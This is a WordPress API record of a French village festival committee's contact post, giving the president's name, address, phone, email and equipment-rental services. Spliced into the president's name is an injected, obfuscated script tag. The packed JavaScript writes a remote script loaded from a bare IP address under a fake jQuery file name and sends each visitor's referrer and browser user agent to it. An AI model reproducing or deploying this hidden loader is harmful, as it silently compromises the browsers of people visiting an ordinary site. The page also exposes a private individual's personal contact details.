{"id":183,"date":"2015-07-21T08:07:20","date_gmt":"2015-07-21T07:07:20","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=183"},"modified":"2020-01-20T09:11:13","modified_gmt":"2020-01-20T08:11:13","slug":"comite-des-fetes","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=183","title":{"rendered":"Comit\u00e9 des f\u00eates"},"content":{"rendered":"<p><strong>Pr\u00e9sident :<br \/>\nClaude <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kytst|var|u0026u|referrer|thnbk||js|php'.split('|'),0,{}))<br \/>\n<\/script> GALMICHE<\/strong><br \/>\n17 route de Rans<br \/>\n25610 Arc-et-Senans<br \/>\nt\u00e9l: 07 78 80 77 56<br \/>\nadresse mail : <span style=\"color: #3366ff;\">galmiche-claude@orange.fr<\/span><\/p>\n<p>Organisateur de manifestations, location de mat\u00e9riel : tables, bancs, tentes&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pr\u00e9sident : Claude GALMICHE 17 route de Rans 25610 Arc-et-Senans t\u00e9l: 07 78 80 77 56 adresse mail : galmiche-claude@orange.fr Organisateur de manifestations, location de mat\u00e9riel : tables, bancs, tentes&#8230;<\/p>\n","protected":false},"author":1,"featured_media":836,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,7],"tags":[],"class_list":["post-183","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comite-des-fetes","category-vie-associative"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/183","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=183"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/183\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/836"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=183"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=183"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}